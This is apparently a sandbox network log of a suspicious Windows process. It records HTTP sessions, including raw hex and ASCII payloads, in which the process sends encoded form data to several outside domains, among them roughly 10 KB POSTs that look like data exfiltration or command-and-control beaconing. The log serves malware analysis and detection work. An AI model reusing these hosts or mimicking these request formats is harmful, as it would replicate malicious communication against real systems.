Pjf7pYNA4kaJwZSswZPxvwW4X79KIS+EGTqQEy5jqNsJzblJdhYVXo6ZbYNxpiWViFwlvivlPZRBYS0NkjuWReHdVnfmmAxMYqfHSjeGKOC58tOD+GSVDh2pKty4cDoQ2nxQn4ynpQmiBOaZ9j3msKg61HXcRO8tSFm/6BFn3UkW/rGrRnObfphRxWihMF2Yil4Qaj0Z2C0MaCOFfBU8fV6z86ubu8k9co9N5+u6KUSbW2H1qvdBBPhjT9Ge+u30oE8yFJqu9Dss6JN5lHDieYGMIIA35Rxs01msqrM9rK2ZnnM [TRUNCATED]
Nov 20, 2024 04:19:46.336446047 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:19:46 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66df9b06-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	64839	38.47.232.202	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:47.998080969 CET	465	OUT	GET /bsyy/?Lhx=fPAh7htHyFPl-&xDq=w9Wsyrfddra1GxcX7luKIP81eOoQqUt/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVtzbO2HWO/vlwyzXb4OCTu0u4SZtJF3c1HS4= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.43kdd.top User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 20, 2024 04:19:48.873739958 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:19:48 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66df9b06-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	64840	130.185.109.77	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:53.972376108 CET	739	OUT	POST /cv1w/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 200 Host: www.lgdiamonds.info Origin: http://www.lgdiamonds.info Referer: http://www.lgdiamonds.info/cv1w/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 48 4b 35 36 44 30 5a 68 2f 66 2b 48 6d 6b 4f 63 6a 50 53 2b 4c 4f 52 48 72 49 30 6c 6a 6d 4a 64 61 59 49 53 6d 31 7a 59 34 56 35 67 30 56 44 69 71 55 67 53 66 34 75 76 4b 35 68 57 5a 70 65 39 6f 66 47 78 58 50 6f 44 69 34 43 49 70 70 4c 78 68 7a 62 4b 6c 42 72 78 58 72 75 39 57 54 76 64 33 65 36 64 45 55 62 47 2b 51 6e 2f 76 69 39 61 50 53 77 44 69 41 52 6a 6a 2b 78 76 77 75 48 4f 53 4f 66 39 37 66 59 77 43 4e 44 77 76 6a 2f 53 79 58 46 6c 2b 2b 6b 34 34 75 4f 59 5a 35 44 6c 44 76 66 64 62 34 61 6a 73 59 2b 31 6d 79 42 76 6a 70 70 6c 6a 4a 39 4e 47 76 4b 32 34 4f 2b 30 79 41 3d 3d Data Ascii: xDq=HK56D0Zh/f+HmkOcjPS+LORHrI0ljmJdaYISm1zY4V5g0VDiqUgSf4uvK5hWZpe9ofGxXPoDi4CIppLxhzbKlBrxXru9WTvd3e6dEUbG+Qn/vi9aPSwDiARjj+xvwuHOSOf97fYwCNDwvj/SyXFl++k44uOYZ5DlDvfdb4ajsY+1myBvjppljJ9NGvK24O+0yA==
Nov 20, 2024 04:19:54.575489044 CET	322	IN	HTTP/1.1 404 Not Found Server: nginx/1.6.2 Date: Wed, 20 Nov 2024 03:19:54 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T$'gd*HN+I-0D7(bTgU!2S>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	64841	130.185.109.77	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:56.529366970 CET	759	OUT	POST /cv1w/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 220 Host: www.lgdiamonds.info Origin: http://www.lgdiamonds.info Referer: http://www.lgdiamonds.info/cv1w/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 48 4b 35 36 44 30 5a 68 2f 66 2b 48 6b 45 2b 63 6c 75 53 2b 63 65 52 47 6c 6f 30 6c 34 57 4a 5a 61 59 55 53 6d 78 71 41 35 6e 74 67 30 30 7a 69 72 51 4d 53 63 34 75 76 43 5a 67 39 58 4a 66 2f 6f 66 36 35 58 4b 51 44 69 38 71 49 70 72 44 78 68 43 62 4e 6a 52 72 7a 61 4c 76 62 53 54 76 64 33 65 36 64 45 55 50 34 2b 51 2f 2f 75 53 4e 61 50 7a 77 41 2b 51 52 73 72 65 78 76 36 2b 48 4b 53 4f 65 48 37 62 59 4b 43 50 37 77 76 69 50 53 78 43 78 6d 30 2b 6b 2b 79 4f 50 75 52 5a 57 54 4a 36 79 78 64 61 79 45 72 62 2b 4f 6a 30 4d 31 79 59 49 79 78 4a 5a 2b 62 6f 44 43 31 4e 44 39 70 45 2f 37 61 4e 4e 32 76 34 73 58 2f 77 49 6b 6f 57 5a 67 66 76 77 3d Data Ascii: xDq=HK56D0Zh/f+HkE+cluS+ceRGlo0l4WJZaYUSmxqA5ntg00zirQMSc4uvCZg9XJf/of65XKQDi8qIprDxhCbNjRrzaLvbSTvd3e6dEUP4+Q//uSNaPzwA+QRsrexv6+HKSOeH7bYKCP7wviPSxCxm0+k+yOPuRZWTJ6yxdayErb+Oj0M1yYIyxJZ+boDC1ND9pE/7aNN2v4sX/wIkoWZgfvw=
Nov 20, 2024 04:19:57.160334110 CET	322	IN	HTTP/1.1 404 Not Found Server: nginx/1.6.2 Date: Wed, 20 Nov 2024 03:19:57 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T$'gd*HN+I-0D7(bTgU!2S>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	64842	130.185.109.77	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:59.082127094 CET	10841	OUT	POST /cv1w/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10300 Host: www.lgdiamonds.info Origin: http://www.lgdiamonds.info Referer: http://www.lgdiamonds.info/cv1w/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 48 4b 35 36 44 30 5a 68 2f 66 2b 48 6b 45 2b 63 6c 75 53 2b 63 65 52 47 6c 6f 30 6c 34 57 4a 5a 61 59 55 53 6d 78 71 41 35 6d 56 67 30 6d 4c 69 71 78 4d 53 64 34 75 76 42 5a 68 61 58 4a 65 6e 6f 66 53 39 58 4b 56 34 69 2b 69 49 6d 75 58 78 6f 51 7a 4e 74 52 72 7a 54 72 76 50 57 54 76 49 33 65 71 5a 45 55 66 34 2b 51 2f 2f 75 52 56 61 59 79 77 41 74 67 52 6a 6a 2b 78 64 77 75 48 69 53 4b 7a 6c 37 62 4d 67 43 38 7a 77 75 43 66 53 69 41 70 6d 32 65 6b 38 78 4f 50 6d 52 5a 4b 41 4a 2b 53 4c 64 66 6d 2b 72 63 4f 4f 68 44 35 57 6f 71 31 75 6d 36 68 6a 50 2f 6e 47 74 50 54 6f 77 46 79 62 52 74 74 65 7a 35 45 37 77 68 56 76 36 44 46 5a 43 34 43 78 6b 75 49 6c 65 62 7a 6c 73 30 75 4b 70 4a 55 2f 44 45 75 68 4d 73 55 36 63 37 53 43 78 33 59 51 68 56 4b 42 6e 48 30 37 48 39 4d 42 73 2f 4a 43 75 39 56 35 55 39 50 47 76 46 48 34 65 2b 50 4a 69 49 4f 6d 71 7a 46 64 4e 48 6f 7a 59 62 2f 52 78 67 4c 6f 43 69 2f 63 2b 72 36 44 31 6a 79 53 35 72 50 59 33 6f 75 54 6c 48 78 59 45 35 6d 52 79 45 31 48 64 4b [TRUNCATED] Data Ascii: xDq=HK56D0Zh/f+HkE+cluS+ceRGlo0l4WJZaYUSmxqA5mVg0mLiqxMSd4uvBZhaXJenofS9XKV4i+iImuXxoQzNtRrzTrvPWTvI3eqZEUf4+Q//uRVaYywAtgRjj+xdwuHiSKzl7bMgC8zwuCfSiApm2ek8xOPmRZKAJ+SLdfm+rcOOhD5Woq1um6hjP/nGtPTowFybRttez5E7whVv6DFZC4CxkuIlebzls0uKpJU/DEuhMsU6c7SCx3YQhVKBnH07H9MBs/JCu9V5U9PGvFH4e+PJiIOmqzFdNHozYb/RxgLoCi/c+r6D1jyS5rPY3ouTlHxYE5mRyE1HdKrSsCBFX97OWkEQxbHYCL/UrnZBiytO7A5dWLwGefSKhTbloRAXMHmpmOoGbsok4EGNyxgkfz452dNbgiXHEauNfLwTQlFYZm6EiFH5lJKFMrHHiGkuLsCoJrCYw6692nRUJs7oxWAgSNYdse2alMNt9Bo0BEioDzpyMzqSZHf2OxUgd7+K5rCAowxrnZTembA3tE68pmI0KmIpMVSzIpTU1+KfJIMrUPJ5/Ai0goejEvipa/JSgt4hsSTxWi7JBWcdCfHlWWcTnQvVCbyxJfb959NGyC3TRc6PaAyCXuJuzWQtYULaqb6O7Htdr+Ye5+CoZpZq4J+BF/mSF5kPSkqOIBSzIMsp5o+186RVbLfu25ry2ddD5JUHpfZq88cSYXWA9AttlLuslkwi4dHMC7PA3WOwfOr5WodImwsmwbslMwCqKQ7YF8emS2ZMWXAK6/M4p+2xybctBkIB/GPV2gUL9wQATiqqm6QyoBC2iO5xrKtkNZDqRtH7IQq2Pog+LQJ5BkNV4zb9u9sp6sXDBQZwYQC/XFe9XL+YCQ09DHBL5OGjx/HPTG/tDgH7zgOwsKPsjIWldd1QoAZ/AFh0dUzixNr9TxjA2VmB8PV0lND15IV5Uy9r+znLYCybK7Ecw34uLSOZQkIcBtxyoExFvpZGFI6DLBeLcMa6 [TRUNCATED]
Nov 20, 2024 04:19:59.688496113 CET	322	IN	HTTP/1.1 404 Not Found Server: nginx/1.6.2 Date: Wed, 20 Nov 2024 03:19:59 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T$'gd*HN+I-0D7(bTgU!2S>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	64843	130.185.109.77	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:01.639405966 CET	471	OUT	GET /cv1w/?xDq=KIRaABhBgujzn3KVjNCYdeU2jI4CiDZHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDesRP/SoiJcG7UzeyTKHH5ghDsthQpYxENiFA=&Lhx=fPAh7htHyFPl- HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.lgdiamonds.info User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 20, 2024 04:20:02.240964890 CET	317	IN	HTTP/1.1 404 Not Found Server: nginx/1.6.2 Date: Wed, 20 Nov 2024 03:20:02 GMT Content-Type: text/html Content-Length: 168 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	64844	108.181.189.7	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:07.319495916 CET	733	OUT	POST /lvda/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 200 Host: www.jalan2.online Origin: http://www.jalan2.online Referer: http://www.jalan2.online/lvda/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 4a 4a 72 79 55 68 4f 30 67 6d 71 6c 6e 2b 68 5a 78 4d 6a 2f 6c 42 38 48 6f 43 31 38 70 74 67 32 6d 61 52 6c 41 58 32 62 65 64 66 72 79 7a 4f 34 4d 67 7a 6c 6f 6b 58 47 2f 72 48 7a 6c 36 6f 53 32 50 78 77 77 54 39 73 66 51 4f 4d 44 66 54 4e 45 4b 75 72 70 4c 42 2f 42 73 45 31 58 48 58 6d 6f 2b 33 41 6e 54 68 44 41 75 59 6e 44 35 74 2b 31 41 72 72 59 52 6b 57 36 30 77 6b 41 44 62 72 52 55 46 66 4f 63 69 79 39 48 4c 77 35 59 52 62 6d 49 6d 5a 76 33 37 63 6e 39 52 76 6c 4a 68 6a 74 56 52 4c 41 55 6a 65 64 36 38 34 42 74 54 34 65 41 5a 79 76 77 73 39 7a 36 6d 37 42 6d 6d 61 42 67 3d 3d Data Ascii: xDq=JJryUhO0gmqln+hZxMj/lB8HoC18ptg2maRlAX2bedfryzO4MgzlokXG/rHzl6oS2PxwwT9sfQOMDfTNEKurpLB/BsE1XHXmo+3AnThDAuYnD5t+1ArrYRkW60wkADbrRUFfOciy9HLw5YRbmImZv37cn9RvlJhjtVRLAUjed684BtT4eAZyvws9z6m7BmmaBg==
Nov 20, 2024 04:20:08.337418079 CET	279	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache date: Wed, 20 Nov 2024 03:20:08 GMT server: LiteSpeed content-encoding: gzip vary: Accept-Encoding transfer-encoding: chunked connection: close Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Nov 20, 2024 04:20:08.337615967 CET	713	IN	Data Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e Data Ascii: 2bdeTkk0^M'va;fc6[u')]I\|ut9W?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqfw6@!Edt,CH4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	64845	108.181.189.7	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:09.879631042 CET	753	OUT	POST /lvda/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 220 Host: www.jalan2.online Origin: http://www.jalan2.online Referer: http://www.jalan2.online/lvda/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 4a 4a 72 79 55 68 4f 30 67 6d 71 6c 32 74 70 5a 33 76 4c 2f 30 78 38 45 32 53 31 38 38 39 68 2f 6d 61 64 6c 41 57 43 4c 65 76 72 72 7a 53 2b 34 4e 6a 72 6c 39 6b 58 47 33 4c 48 32 68 36 6f 4e 32 50 39 65 77 53 42 73 66 51 61 4d 44 66 6a 4e 45 39 79 73 76 62 42 48 4a 4d 45 37 54 48 58 6d 6f 2b 33 41 6e 54 30 6d 41 76 77 6e 44 49 64 2b 31 68 72 73 47 42 6b 52 79 55 77 6b 4b 6a 62 76 52 55 46 68 4f 59 72 6c 39 45 7a 77 35 59 42 62 6d 63 79 61 67 33 37 67 6a 39 52 6b 74 4c 49 53 72 33 6f 6b 4a 33 4c 62 65 4c 49 33 45 72 65 69 50 78 34 6c 39 77 49 4f 75 39 76 50 4d 6c 62 54 61 6d 34 70 69 55 4c 51 77 39 54 55 71 47 67 61 36 6f 4d 55 5a 64 59 3d Data Ascii: xDq=JJryUhO0gmql2tpZ3vL/0x8E2S1889h/madlAWCLevrrzS+4Njrl9kXG3LH2h6oN2P9ewSBsfQaMDfjNE9ysvbBHJME7THXmo+3AnT0mAvwnDId+1hrsGBkRyUwkKjbvRUFhOYrl9Ezw5YBbmcyag37gj9RktLISr3okJ3LbeLI3EreiPx4l9wIOu9vPMlbTam4piULQw9TUqGga6oMUZdY=
Nov 20, 2024 04:20:10.531287909 CET	992	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache date: Wed, 20 Nov 2024 03:20:10 GMT server: LiteSpeed content-encoding: gzip vary: Accept-Encoding transfer-encoding: chunked connection: close Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e a7 70 31 12 28 97 c2 67 49 1c bf 1d 85 5f c8 38 7d 5a f4 0c 34 6b 29 60 2d 71 d3 19 eb 47 50 1b ed 51 fb c5 68 23 b9 17 0b 8e 6b 59 63 d4 0f c6 20 b5 f4 92 a9 c8 d5 8c 60 93 31 38 61 a5 be 8f bc 89 1a e9 17 da 04 74 2f bd c2 12 d2 38 85 9f c6 c3 57 b3 d2 fc cd 59 31 1d e6 8b 9e 52 f9 a1 45 2e 19 5c 76 16 1b b4 2e aa 8d 32 96 70 05 b6 98 71 66 ef af 1e 2a c3 77 0f 15 ab ef 97 36 40 0c 21 d9 45 1c c7 e7 b2 0d 64 99 f6 8f 8f c5 74 00 2c a6 fb ac c2 b2 43 de c3 12 b8 48 d3 34 87 96 d9 a5 d4 59 9c 37 94 62 06 da d8 96 29 48 d2 6e 3b 9d c5 dd 16 3e 5a 4a 6d 0c df 50 ad d1 cb 9a 51 76 4c bb c8 a1 95 4d 0e 27 12 e6 f0 8a 15 5c 34 4d 93 87 ec b9 5c bf 50 9d ad bc a1 dd a5 8e 9e 61 8c 4a 08 cf e9 02 8f 5b 1f 31 25 97 3a 83 [TRUNCATED] Data Ascii: a2bdeTkk0^M'va;fc6[u')]I\|ut9W?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqfw6@!Edt,CH4Y7b)Hn;>ZJmPQvLM'\4M\PaJ[1%:L@C\|>&"%dgbtgct\]9B$@%rfUR0l(N2)= lMh<Y:tyT+,ZF9F{^L;}"h8gY>q.2hkk^O$NhuB+c9>(:.+v6IW`l2xcxz+:}_-ohWvT$dm47/kDa-4_Jt] %6$YvLi>Fj3bC{.~p/+a0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	64846	108.181.189.7	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:12.433161974 CET	10835	OUT	POST /lvda/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10300 Host: www.jalan2.online Origin: http://www.jalan2.online Referer: http://www.jalan2.online/lvda/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 4a 4a 72 79 55 68 4f 30 67 6d 71 6c 32 74 70 5a 33 76 4c 2f 30 78 38 45 32 53 31 38 38 39 68 2f 6d 61 64 6c 41 57 43 4c 65 76 54 72 7a 6b 43 34 4d 43 72 6c 76 55 58 47 39 72 48 33 68 36 6f 45 32 50 56 53 77 53 4e 57 66 53 69 4d 52 73 62 4e 47 50 61 73 6d 62 42 48 4c 4d 45 36 58 48 57 38 6f 2b 6e 4d 6e 51 4d 6d 41 76 77 6e 44 4c 31 2b 38 51 72 73 45 42 6b 57 36 30 77 67 41 44 62 4c 52 55 4d 61 4f 59 75 59 68 6c 54 77 36 38 64 62 6b 70 6d 61 70 33 37 59 6b 39 51 6b 74 4c 55 4a 72 33 30 43 4a 32 2f 78 65 4c 38 33 47 2f 7a 49 55 42 49 73 6b 7a 4d 57 35 4d 44 7a 4d 43 6e 66 55 57 59 31 73 68 54 62 6a 4a 61 32 73 30 67 53 74 5a 45 6f 4c 39 76 42 67 78 43 6a 41 4d 6d 67 39 67 43 47 59 76 62 66 32 4d 6e 78 59 4b 2b 72 4a 74 70 61 6e 71 6b 6c 47 45 32 77 76 6e 54 6a 50 57 6e 4b 4f 4d 7a 72 33 71 58 4c 37 51 6f 54 6b 78 32 57 6e 7a 4f 51 69 50 32 55 59 41 41 66 70 64 57 35 6b 30 48 79 51 4a 71 68 71 43 52 74 53 61 70 57 2f 64 36 6c 6b 54 31 72 57 58 50 49 32 42 42 34 6d 6e 31 4f 4e 64 6e 48 37 4a [TRUNCATED] Data Ascii: 